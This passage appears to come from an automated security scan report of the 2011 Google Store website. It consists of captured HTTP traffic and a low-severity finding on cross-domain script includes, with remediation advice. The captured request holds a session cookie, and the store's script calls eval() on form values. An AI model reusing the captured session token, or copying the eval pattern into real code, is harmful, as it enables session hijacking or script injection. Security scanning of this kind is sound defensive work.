Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14033
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Oct 2011 19:17:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>Google Online Store :: Shopping Cart</title>
       <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
       <meta name='keywords' content='' />
       <meta name='description' content='' />

<script type="text/javascript">
var r = Math.random();
var t = document.createElement("img");
t.onload = function() {
var t2 = document.createElement("img");
t2.onload = function() {
var t3 = document.createElement("img");
t3.onload = function() { return; };
t3.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp3&random=" + r;
};
t2.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp2&random=" + r;
};
t.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp1&random=" + r;
</script>
<noscript>
<img src="http://www.google-analytics.com/__utm.gif?label=ct_gs_exp_ns" />
</noscript>

<script language="JavaScript" type="text/JavaScript" src="./js/common.js"></script>
    <link href="./css/main.css" rel="stylesheet" type="text/css" />
        
    <link href="./css/home.css" rel="stylesheet" type="text/css" />

    <script type="text/javascript">
function setCartTotal(fld)
{
eval(fld.options[fld.options.selectedIndex].value);
}

function setCartTotalEval(shipMethod, cartTotal)
{
document.getElementById("cart_total").innerHTML = cartTotal;
document.forms['frmShoppingCart']['ship_method'].value = shipMethod;
}
</script>

    </head>
   <body>

<div id="wrapper">
    <div id="header">
    <a href="/shop.axd/Home"><img src="./images/googlestore_logo.gif" alt="GoogleStore" /></a>
    <div style="position:absolute; top:0; right:0; z-index:101; width:174px; height:31px;"><a href="/You+Tube/"><img style="border:0" src="/images/new_top_link.jpg" alt="Check Out the You Tube Items" /></a></div>
    <ul>
    <li><a href="http://www.google.com">Google Search</a></li>
    <li><a href="http://www.google.com/about.html">About Google</a></li>
    </ul>
    </div>
<div id="left_content">


<div class="box-round">
<div class="top"><span><h2 class="side_head">Categories</h2></span></div>
<div class="center-content">
<ul>
</li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/accessories_off.gif) left no-repeat;" href=/googlesearch.aspx?category=accessories >Accessories</a></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/fun_off.gif) left no-repeat;" href=/googlesearch.aspx?category=fun >Fun</a></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/kids_off.gif) left no-repeat;" href=/googlesearch.aspx?category=kids >Kids</a></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/office_off.gif) left no-repeat;" href=/googlesearch.aspx?category=office >Office</a></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/wearables_off.gif) left no-repeat;" href=/googlesearch.aspx?category=wearables >Wearables</a></li><li class="nav off"><a class="main textpopup" onclick="recordOutboundLink(this, 'Outbound Links', 'Zazzle.com LeftNav');return false;" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." style="background:url(/images/category_icons/doodles_off.gif) left no-repeat;" href=http://www.zazzle.com/googledoodles >Doodles on Demand</a></li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>

<div class="box-round" style="margin-top:10px;">
<div class="top"><span><h2 class="side_head">Eco Reference</h2></span></div>
<div class="center-content">
<ul class="eco_guide">
<li style="background:url(/images/greeninitiative/1.jpg) no-repeat left;">Sustainable</li>
<li style="background:url(/images/greeninitiative/2.jpg) no-repeat left;">Organic</li>
<li style="background:url(/images/greeninitiative/3.jpg) no-repeat left;">Recycled</li>
<li style="background:url(/images/greeninitiative/4.jpg) no-repeat left;">Non-Polluting</li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>

</div>

<div id="content">

<h1>Shopping Cart</h1>
<table style="width:100%;" cellpadding="0" cellspacing="0">

<div id="CookieBox"></div>

   
   <tr>
       <td>







<table id="cartTable" cellpadding="5" cellspacing="0" >
    <form action="/shop.axd/UpdateCart" method="post" name="frmShoppingCart">

<tr class="cart-hdr">
<td colspan="2">Product</td>
<td align="center" >Qty</td>
<td align="center" >Price Each</td>
<td align="center" >Total Price</td>
<td class="last" align="center" >Remove Item</td>
</tr>
<input type="hidden" name="id" value="1030631" />
<tr class="cart-item">
<td colspan="2">

<a href="/Eco/American+Apparel+Ladies+Organic+Tee.axd" class="cart-desc">
American Apparel Ladies' Organic Tee WHITE S
</a>

<br /><i>Item #10 13124 WH S</i>

</td>

<td align="center">
<input type="text" name="qty_1030631" value="1" size="1" maxlength="4" />
</td>
<td align="center">$10.00</td>
<td align="center">$10.00</td>
<td align="center"><a href="javascript:deleteCartLine(1030631);void(0);">remove</a></td>

</tr>
<input type="hidden" name="id" value="1030630" />
<tr class="cart-item">
<td colspan="2">

<a href="/Eco/American+Apparel+Ladies+Organic+Tee.axd" class="cart-desc">
American Apparel Ladies' Organic Tee WHITE S
</a>

<br /><i>Item #10 13124 WH S</i>

</td>

<td align="center">
<input type="text" name="qty_1030630" value="1" size="1" maxlength="4" />
</td>
<td align="center">$10.00</td>
<td align="center">$10.00</td>
<td align="center"><a href="javascript:deleteCartLine(1030630);void(0);">remove</a></td>

</tr>

<tr class="cart-totals">
        <td colspan="4" align="left">

<a href="/Eco/American+Apparel+Ladies+Organic+Tee.axd"><img src="/images/btn_continueshopping.gif" /></a>
 
        <input name="Update" src="/images/btn_updatecart.gif" style="border:0" type="image" /></td>
<td align="right"> <strong>$20.00</strong></td>
<td align="center"><strong>Subtotal</strong></td>
</tr>

<tr><td colspan="6"> </td></tr>

    <tr>
<td colspan="4" align="left"></td>
<td align="right"><span id="Label2">calculated at checkout</span></td>
<td align="center"><strong>Shipping </strong></td>
</tr>
<tr><td colspan="6"> </td></tr>
<tr class="cart_totals">
        <td colspan="4" align="left">
        <table style="font-size:11px;">
<tr>
<td>Discount Code: 
<input style="font-size:11px;" type="text" name="source_code" value="" size="8" />
 <input style="font-size:11px;" type="submit" value="Apply" /></td>
</tr>
<tr><td colspan="4"><i>(If you have a coupon / gift certificate please enter at checkout)</i></td></tr>
</table>
        </td>
        <td align="right" > <strong>
<div id="cart_total">
$20.00
</div>
</strong></td>
<td align="center" style="border-top:0px solid #CA6;"><strong>Total </strong></td>
</tr>
<tR><td colspan="6"> </td></tR>
    
    <input type="hidden" name="ship_method" value="18" />
<input type="hidden" name="delete_cart_line_id" value="" />
</form>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write("<sc" + "ript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'>" + "</sc" + "ript>");
</script>

<script type="text/javascript">
var firstTracker = _gat._getTracker("UA-30481-1");
firstTracker._initData();
firstTracker._trackPageview();

var secondTracker = _gat._getTracker("UA-735212-16");
secondTracker._setLocalRemoteServerMode();
secondTracker._initData();
secondTracker._trackPageview();
</script>

<script src="http://checkout.google.com/files/digital/ga_post.js" type="text/javascript"></script>

<form name="Form1" method="post" action="shoppingcart.aspx?item_no=&cookieCheck=true" id="Form1" onsubmit="setUrchinInputCode(firstTracker);">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg1NTM5NjY1MA9kFgICBQ9kFgJmD2QWAgIBD2QWAgIDDw8WAh4ISW1hZ2VVcmwFFi9pbWFnZXMvYnRuX3NpZ251cC5naWZkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBAUQR0NoZWNrb3V0QnV0dG9uMQUQR0NoZWNrb3V0QnV0dG9uMwUQR0NoZWNrb3V0QnV0dG9uMgUfY3RsUmlnaHROYXYkY3RsU2lnbnVwJGJ0blNpZ25VcA==" />
</div>

<div>

   <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWAgLw48iODgKcnpuLBQ==" />
</div>

<tr>
<td colspan="6" align="left">
<div style="overflow:hidden;">
<div style="float:left">

</div>
<div style="float:right; text-align:right">
<span id="Label1"></span>
        <input type="image" name="GCheckoutButton1" id="GCheckoutButton1" src="http://checkout.google.com/buttons/checkout.gif?merchant_id=152464052491266&w=168&h=44&style=white&variant=text&loc=en_US" style="height:44px;width:168px;border-width:0px;" />

</div>
</div>
</td>
</tr>

<input type="hidden" name="analyticsdata" value="">

</form>
</table>


</td>
</tr>

</table>


</div>
<div id="right_content">


<style type="text/css">
.signup-tb{
width:135px;
font-size:.9em;
margin-top:5px;
margin-bottom:5px;
}

.signup-btn{
font-size:.9em;
}

.lblMessage{
font-weight:bold;

}

.formsuccess{
font-weight:bold;
color:green;
}

.formerror{
font-weight:bold;
color:red; }
</style>

<div class="box-round">
<div class="top">
<span>
<h2 class="side_head">Store Links</h2>
</span>
</div>
<div class="center-content">
<ul class="store-links">
<li><a href="/shop.axd/Cart" class="shopping-cart">Shopping Cart (2)</a></li>

<li><a href="/shop.axd/Contact">Customer Service</a></li>
<li><a href="/shop.axd/Contact#warranty">Warranty / Returns</a></li>

</ul>

<ul>

<li><a href="/googlesearch.aspx?topseller=yes">Top Sellers</a></li>
<li><a href="/googlesearch.aspx?isnew=yes">What's New</a></li>
<li><a href="/googlesearch.aspx?category=eco">Eco-Friendly Items</a></li>
<li><a href="/googlesearch.aspx?specials=yes">Specials</a></li>
<li><a href="/Mini/"><b>Google Mini</b></a></li>

</ul>
</div>
<div class="bottom"><span></span></div>
</div>

</div>

<div id="footer">
<ul id="navigation_footer_ul">
<li><a href="/shop.axd/Contact">Customer Service</a></li>
<li><a href="/shop.axd/Cart">Shopping Cart</a></li>
</ul>
<div id="legal">
Copyright Google Inc. All Rights Reserved.<br />
Use of this service constitutes your acceptance of the Google Store's <a href="/shop.axd/PrivacyPolicy">privacy policy</a>.
</div>
</div>
    </div>
    <script type="text/javascript">
function deleteCartLine(cartLineId)
{
   var frmCart = document.forms["frmShoppingCart"];
   var fld = frmCart["delete_cart_line_id"];
   fld.value = cartLineId;
   frmCart.submit();
}
</script>

   </body>
</html>

4. Cross-domain script include previous next
There are 12 instances of this issue:

/Eco/American+Apparel+Ladies+Organic+Tee.axd
/Mini/
/Mini/Google+Mini+2+0+300K+-+2+YR.axd
/Office/Momentum+Computer+Portfolio.axd
/Office/Pack+of+10+Recycled+Paper+Pencils.axd
/Office/Reversible+Neoprene+Laptop+Sleeve.axd
/Wearables/Organic+Black+is+Back+T-Shirt.axd
/Wearables/Tiki+Android+T-Shirt.axd
/googlesearch.aspx
/shop.axd/Home
/shop.axd/PrivacyPolicy
/shoppingcart.aspx

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

4.1. http://www.googlestore.com/Eco/American+Apparel+Ladies+Organic+Tee.axd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googlestore.com
Path:	/Eco/American+Apparel+Ladies+Organic+Tee.axd

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js
https://www.google.com/cse/intl/en-US/sayt.js
https://www.google.com/jsapi

Request

GET /Eco/American+Apparel+Ladies+Organic+Tee.axd HTTP/1.1
Host: www.googlestore.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.googlestore.com/googlesearch.aspx?specials=yes&rankBy=price:ascending
Cookie: ASP.NET_SessionId=4n1rd3u3ovrt2o45f1fvmo45; __utma=148589601.1599814706.1319223601.1319223601.1319223601.1; __utmb=148589601.28.10.1319223601; __utmc=148589601; __utmz=148589601.1319223601.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 27851
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Oct 2011 19:17:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title>American Apparel Ladies' Organic Tee</title>
       <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
       <meta name='keywords' content='' />
       <meta name='description' content='' />

<script type="text/javascript">
var r = Math.random();
var t = document.createElement("img");
t.onload = function() {
var t2 = document.createElement("img");
t2.onload = function() {
var t3 = document.createElement("img");
t3.onload = function() { return; };
t3.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp3&random=" + r;
};
t2.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp2&random=" + r;
};
t.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp1&random=" + r;
</script>
<noscript>
<img src="http://www.google-analytics.com/__utm.gif?label=ct_gs_exp_ns" />
</noscript>

<script language="JavaScript" type="text/JavaScript" src="/js/common.js"></script>
    <link href="/css/main.css" rel="stylesheet" type="text/css" />
    <link href="/css/home.css" rel="stylesheet" type="text/css" />
    
    <link rel="stylesheet" href="/css/syat.css" type="text/css" media="screen" />

<script type="text/javascript">
function click(theevent){
try{
firstTracker._trackEvent('product_page', theevent);
}catch(err){ }
}
</script>
   </head>
<body>
<div id="wrapper">
    <div id="header" style="height:70px">




        <a href="/shop.axd/Home"><img src="/images/googlestore_logo.gif" alt="GoogleStore" /></a>

    <div style="width:100%;position:absolute; top:0; right:0px; width:90px; height:52px;">
    <a href="/You+Tube/"><img style="border:0" src="/images/new_top_link.jpg" alt="Check Out the You Tube Items" /></a>
    </div>

    <ul>
    <li><a href="/You+Tube/">You Tube Home</a></li>
    <li><a href="http://www.google.com">Google Search</a></li>
    <li><a href="http://www.google.com/about.html">About Google</a></li>
    </ul>

    </div>

<div id="left_content">



<div class="box-round">
<div class="top"><span><h2 class="side_head">Categories</h2></span></div>
<div class="center-content">
<ul>
</li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/accessories_off.gif) left no-repeat;" href=/googlesearch.aspx?category=accessories >Accessories</a></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/fun_off.gif) left no-repeat;" href=/googlesearch.aspx?category=fun >Fun</a></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/kids_off.gif) left no-repeat;" href=/googlesearch.aspx?category=kids >Kids</a></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/office_off.gif) left no-repeat;" href=/googlesearch.aspx?category=office >Office</a></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/wearables_off.gif) left no-repeat;" href=/googlesearch.aspx?category=wearables >Wearables</a></li><li class="nav off"><a class="main textpopup" onclick="recordOutboundLink(this, 'Outbound Links', 'Zazzle.com LeftNav');return false;" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." style="background:url(/images/category_icons/doodles_off.gif) left no-repeat;" href=http://www.zazzle.com/googledoodles >Doodles on Demand</a></li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>

<div class="box-round" style="margin-top:10px;">
<div class="top"><span><h2 class="side_head">Eco Reference</h2></span></div>
<div class="center-content">
<ul class="eco_guide">
<li style="background:url(/images/greeninitiative/1.jpg) no-repeat left;">Sustainable</li>
<li style="background:url(/images/greeninitiative/2.jpg) no-repeat left;">Organic</li>
<li style="background:url(/images/greeninitiative/3.jpg) no-repeat left;">Recycled</li>
<li style="background:url(/images/greeninitiative/4.jpg) no-repeat left;">Non-Polluting</li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>

</div>
<div id="content">

<script type="text/javascript" src="/js/jquery-1.3.2.min.js"></script>
<script type="text/javascript" src="/js/addtl.js"></script>
<link rel="stylesheet" href="/css/popup.css" />

<style type="text/css">
.search_top
{
    font-size:15px;
    margin-bottom:15px;
}
.search_top select{ font-size:13px;}
</style>

<div class="search_top">

<form action="/googlesearch.aspx" id="search" method="get">
<b>Search:</b>
<select name="category">

<option value="all">All Products</option>
<option value="eco" >Eco-Friendly</option>
<option value="wearables" >Wearables</option>
<option value="youtube" >You Tube</option>
<option value="accessories" >Accessories</option>
<option value="office" >Office</option>
<option value="doodles" >Doodles</option>
<option value="kids" >Kids</option>
<option value="fun" >Fun</option>
<option value="apps" >Apps</option>
</select>

<input name="q" id="q" autocomplete="off" class="searchbox" style="width:280px; color:#333;" value="keyword / item #" autocomplete="off" onfocus="if(this.value=='keyword / item #')value=''" onblur="if(this.value=='')value='keyword / item #';" type="text"/>
<input type="image" src="/images/btn_search.gif" class="button" value="search" />
</form>

</div>
<div id="product">

<h1>Eco</h1>

<div id="breadcrumbs_only">

<a href="http://www.googlestore.com/shop.axd/Home">Home</a> <span>/</span>

<a href="/Eco/">Eco</a>
</div>
   <div id="product_info">

<script type="text/javascript" src="/js/style.js"></script>
<script type="text/javascript">
var styleProducts = new Array();
var styleDescriptions = new Array();

function addToWishList(frmName)
{
   var frm = document.forms[frmName];
   frm.action = '/shop.axd/AddToWishList';
   frm.submit();
}

function swatchImageClick(color)
{
   var fld = document.forms['frmProductDetails']['l2desc'];

   for(i = 0; i < fld.options.length; i++)
   {
       if (fld.options[i].value == color)
       {
           fld.selectedIndex = i;
           break;
       }
   }

   styleOnChange('frmProductDetails', '','10 13124 ', 2, 2, true);
}
</script>

<form action="/shop.axd/AddToCartBP" method="post" name="frmProductDetails">
<table border="0" cellpadding="10" cellspacing="0" width="100%" class="product_table">
<tr>
   <td valign="top" width="200">

<div id="product-image-wrap">
<a id="ProductImageHref" onclick="click('Enlarge Image')" style="text-decoration:none;" href="javascript:newWindow('/view_large.aspx?img=%2fcontent%2fimages%2flarge%2f10+13124.jpg&edp_no=15176',420,600)">
<img id="ProductImage" width="225px" src="/content/images/standard/10 13124 a.jpg" alt="" />
</a>
<img class="ecotags" src="/images/greeninitiative/organic_s.jpg" title="Made from materials grown without the use of harmful synthetic chemicals.">

<img style="position:absolute; top:0px; right:0;" src='/images/saleicon.jpg' alt='Sale'><img style="position:absolute; top:27px;right:2px;" src="/content/Images/flagUSA.JPG" alt="Made In USA" title="Made In USA">

<div style="position:relative; overflow:hidden; width:215px">
<a style="float:left;" onclick="click('Enlarge Image')" href="javascript:newWindow('/view_large.aspx?img=%2fcontent%2fimages%2flarge%2f10+13124.jpg&edp_no=15176',420,600)" class="enlarge">Enlarge image</a>

<a style="float:right" onclick="click('Size Chart')" href="javascript:newWindow('/sizechart.aspx?img=%2fcontent%2fimages%2flarge%2f10+13124.jpg&edp_no=15176&itemno=10 13124',600,600,true)" class="enlarge">Size chart</a>

</div>
</div>

<span class='mhead' style='background:#FFF;'>Mouseover image to view</span><ul id="multiple"><li><a id="/content/Images/Large/WhtTBk.jpg" style="border:1px solid #FFF;" href="javascript:newWindow('/view_large.aspx?img=%2fcontent%2fimages%2flarge%2f10+13124.jpg&edp_no=15176',420,600)"><img id="0" style="border:1px solid #eee;" src="/content/Images/SuperThumb/WhtTBk C.jpg" alt=""></a><img id="i0" src="/content/Images/Standard/WhtTBk A.jpg" style="display:none;" /></li></ul>

<script type="text/javascript">

var mainSrc = $("#ProductImage").attr("src");
$("#multiple li a").bind("mouseenter", function(e){
$(this).css("border","1px solid #eee");
var ssrc = $(this).children("img").attr("src");
var inum = $(this).children("img").attr("id");
var medSrc = $("#i" + inum).attr("src");
if(medSrc == undefined){
medSrc = ssrc.replace("C.jpg","A.jpg");
}
$("#ProductImage").attr("src",medSrc);

});

$("#multiple li a").bind("mouseleave", function(e){
$(this).css("border","1px solid #FFF");
});

$("#multiple").bind("mouseleave", function(e){
$("#ProductImage").attr("src","/content/images/standard/10 13124 a.jpg");
});
</script>

</td>
        <td valign="top" class="product_details">
<h2>American Apparel Ladies' Organic Tee</h2>
        <b>Item #:</b> 10 13124<br /><br />
<p class="blocktext">Are you ladies looking for a way to sport the YouTube logo as well? This American Apparel tee is made of 100% organic fine jersey cotton that is combed for softness and comfort. Other features include that it is contoured to flatter women's curves, reinforced shoulder construction to maintain shape through repeated washings and durable double-stitched bottom hem. This item comes in white with a screened full color YouTube logo across the chest.</p>

<div class="price">
<b style="color:#990000">Sale Price:</b> $10.00
</div>
       <div class="saleprice">Was: $12.50</div>







<div class="product_colors">
<b>Available Colors:</b><br />
<ul>

                        <li>
                        <a href="javascript:swatchImageClick('WHITE');void(0);"><img style="border:1px solid #CCC;" src="/images/catalog/swatch/WHITE.jpg" alt="WHITE" width="20" height="20" border="0"></a>
                           </li>

</ul>
</div>

<table cellpadding="0" cellspacing="0">
<tr>
            <td colspan="2">

<script type="text/javascript" src="/js/prototype/style.js"></script>
<script lang="javascript">
styleProducts['10 13124 '] = new Array();

styleProducts['10 13124 '][0] = new Array("S","WHITE","WHITE", "$10.00" , "0", " Sold out");

styleProducts['10 13124 '][1] = new Array("M","WHITE","WHITE", "$10.00" , "-1", " Sold out");

styleProducts['10 13124 '][2] = new Array("XL","WHITE","WHITE", "$10.00" , "29", " In stock");

styleProducts['10 13124 '][3] = new Array("2XL","WHITE","WHITE", "$11.68" , "16", " In stock");

styleDescriptions['10 13124 '] = new Array();

styleDescriptions['10 13124 '][1] = 'Size';

styleDescriptions['10 13124 '][2] = 'Color';

</script>

<table cellpadding="0" cellspacing="0" id="style_controls">
<tr>

<td><b>Size</b></td>

<td><b>Color</b></td>

<td><b>Qty</b></td>
</tr>
<tr>

<td><select id="" class="l1desc" name="l1desc" onchange="changeStyleMessage('frmProductDetails', 'l1desc','10 13124 ', 1, 2, true)">

<option id="" value="S" selected>S</option>

<option id="" value="M">M</option>

<option id="" value="XL">XL</option>

<option id="" value="2XL">2XL</option>

</select>
</td>

<td><select id="" class="l2desc" name="l2desc" onchange="changeStyleMessage('frmProductDetails', 'l2desc','10 13124 ', 2, 2, true)">

<option id="" value="WHITE" selected>WHITE - $10.00</option>

</select>
</td>

<td>
<select name="qty">

<option>0</option>

<option selected>1</option>

<option>2</option>

<option>3</option>

<option>4</option>

<option>5</option>

<option>6</option>

<option>7</option>

<option>8</option>

<option>9</option>

<option>10</option>

<option>11</option>

<option>12</option>

<option>13</option>

<option>14</option>

<option>15</option>

<option>16</option>

<option>17</option>

<option>18</option>

<option>19</option>

<option>20</option>

<option>21</option>

<option>22</option>

<option>23</option>

<option>24</option>

<option>25</option>

<option>26</option>

<option>27</option>

<option>28</option>

<option>29</option>

<option>30</option>

<option>31</option>

<option>32</option>

<option>33</option>

<option>34</option>

<option>35</option>

<option>36</option>

<option>37</option>

<option>38</option>

<option>39</option>

<option>40</option>

<option>41</option>

<option>42</option>

<option>43</option>

<option>44</option>

<option>45</option>

<option>46</option>

<option>47</option>

<option>48</option>

<option>49</option>

<option>50</option>

<option>51</option>

<option>52</option>

<option>53</option>

<option>54</option>

<option>55</option>

<option>56</option>

<option>57</option>

<option>58</option>

<option>59</option>

<option>60</option>

<option>61</option>

<option>62</option>

<option>63</option>

<option>64</option>

<option>65</option>

<option>66</option>

<option>67</option>

<option>68</option>

<option>69</option>

<option>70</option>

<option>71</option>

<option>72</option>

<option>73</option>

<option>74</option>

<option>75</option>

<option>76</option>

<option>77</option>

<option>78</option>

<option>79</option>

<option>80</option>

<option>81</option>

<option>82</option>

<option>83</option>

<option>84</option>

<option>85</option>

<option>86</option>

<option>87</option>

<option>88</option>

<option>89</option>

<option>90</option>

<option>91</option>

<option>92</option>

<option>93</option>

<option>94</option>

<option>95</option>

<option>96</option>

<option>97</option>

<option>98</option>

<option>99</option>

<option>100</option>

</select>
</td>
</tr>

<tr><td colspan="5"><span id="inventoryStatusMessage">
Select your Color/Size Combination
</span></td></tr>

</table>
<br /><br />

            </td>
        </tr>
        <tr>
            <td></td>
            <td>

<table cellpadding="0" cellspacing="0">
<tr>
<td align="left">

<a href="http://www.googlestore.com/Eco/cid=454/shop.axd/Category"><img src="/images/btn_continueshopping.gif" border=0></a>


  

<input name="imageField" type="image" src="/images/btn_addtocart.gif" onclick="click('Add To Cart')" border="0" />

</td>
</tr>
</table>
</td>
</tr>
    </table>
   </td>
</tr>
</table>
   <input type="hidden" name="type" value="S">

<input type="hidden" name="cid" value="454">

<input type="hidden" name="style_id" value="10 13124 ">
<input type="hidden" name="edp_no" value="15176">

</form>

<br />
<b class="b_header">You may also like...</b>
<div id="cross_sells">
<ul>

<li>
<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkImageClick/YouTube Full Zip Ladies Fleece : American Apparel Ladies Organic Tee');" href="/You+Tube/Wearables/YouTube+Full+Zip+Ladies+Fleece.axd"><img src="/images/products/dirs/10 24063/10-24063B.jpg" alt="YouTube Full Zip Ladies Fleece" /></a>
<div class="price">
<b>Price:</b> $52.20
</div>

<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkClick/YouTube Full Zip Ladies Fleece : American Apparel Ladies Organic Tee');" href="/You+Tube/Wearables/YouTube+Full+Zip+Ladies+Fleece.axd">YouTube Full Zip Ladies Fleece</a>
</li>

<li>
<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkImageClick/Encore Ladies Jacket : American Apparel Ladies Organic Tee');" href="/Specials/Encore+Ladies+Jacket.axd"><img src="/content/images/thumb/10-25015b.jpg" alt="Encore Ladies Jacket" /></a>
<div class="price">
<b>Price:</b> $64.96
</div>

    <div class="oldprice">Was: $81.20</div>

<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkClick/Encore Ladies Jacket : American Apparel Ladies Organic Tee');" href="/Specials/Encore+Ladies+Jacket.axd">Encore Ladies Jacket</a>
</li>

<li>
<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkImageClick/YouTube Pullover Hooded Sweatshirt : American Apparel Ladies Organic Tee');" href="/You+Tube/Wearables/YouTube+Pullover+Hooded+Sweatshirt.axd"><img src="/content/images/thumb/10-14058b.jpg" alt="YouTube Pullover Hooded Sweatshirt" /></a>
<div class="price">
<b>Price:</b> $29.35
</div>

<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkClick/YouTube Pullover Hooded Sweatshirt : American Apparel Ladies Organic Tee');" href="/You+Tube/Wearables/YouTube+Pullover+Hooded+Sweatshirt.axd">YouTube Pullover Hooded Sweatshirt</a>
</li>

<li>
<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkImageClick/You "Tube" Socks : American Apparel Ladies Organic Tee');" href="/You+Tube/Accessories/You+Tube+Socks.axd"><img src="/content/images/thumb/10-17102b.jpg" alt="You "Tube" Socks" /></a>
<div class="price">
<b>Price:</b> $6.00
</div>

<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkClick/You "Tube" Socks : American Apparel Ladies Organic Tee');" href="/You+Tube/Accessories/You+Tube+Socks.axd">You "Tube" Socks</a>
</li>

</ul>
</div>



   </div>

   <img src="http://int.teracent.net/tase/int?adv=296&fmt=redir&sec=0&pid=prod&prodID=1013124" width="1" height="1" />
</div>
</div>
<div id="right_content">



<style type="text/css">
.signup-tb{
width:135px;
font-size:.9em;
margin-top:5px;
margin-bottom:5px;
}

.signup-btn{
font-size:.9em;
}

.lblMessage{
font-weight:bold;

}

.formsuccess{
font-weight:bold;
color:green;
}

.formerror{
font-weight:bold;
color:red; }
</style>

<div class="box-round" style="margin-bottom:10px;">
<div class="top">
<span>
<h2 class="side_head">Newsletter Signup</h2>
</span>
</div>

<div class="center-content">
<span id="Template_ctlRightNav_ctlSignup_Label1" class="lblMessage">I want to receive promotional email from GatewayCDI.</span><br />
<form name="aspnetForm" method="post" action="#" id="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUENTM4MQ9kFgJmD2QWAgIDD2QWAgIFD2QWAmYPZBYCAgEPZBYCAgMPDxYCHghJbWFnZVVybAUWL2ltYWdlcy9idG5fc2lnbnVwLmdpZmRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBShUZW1wbGF0ZSRjdGxSaWdodE5hdiRjdGxTaWdudXAkYnRuU2lnblVw" />
</div>

<div>

   <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWAwL5t4CVDgKc3s3hCgKHlcOwBw==" />
</div>
<input name="Template$ctlRightNav$ctlSignup$EmailAddress" type="text" maxlength="50" id="Template_ctlRightNav_ctlSignup_EmailAddress" class="signup-tb" />
<input type="image" name="Template$ctlRightNav$ctlSignup$btnSignUp" id="Template_ctlRightNav_ctlSignup_btnSignUp" src="/images/btn_signup.gif" style="border-width:0px;" />
</form>
</div>
<div class="bottom"><span></span></div>
</div>

<div class="box-round">
<div class="top">
<span>
<h2 class="side_head">Store Links</h2>
</span>
</div>
<div class="center-content">
<ul class="store-links">
<li><a href="/shop.axd/Cart" class="shopping-cart">Shopping Cart (0)</a></li>

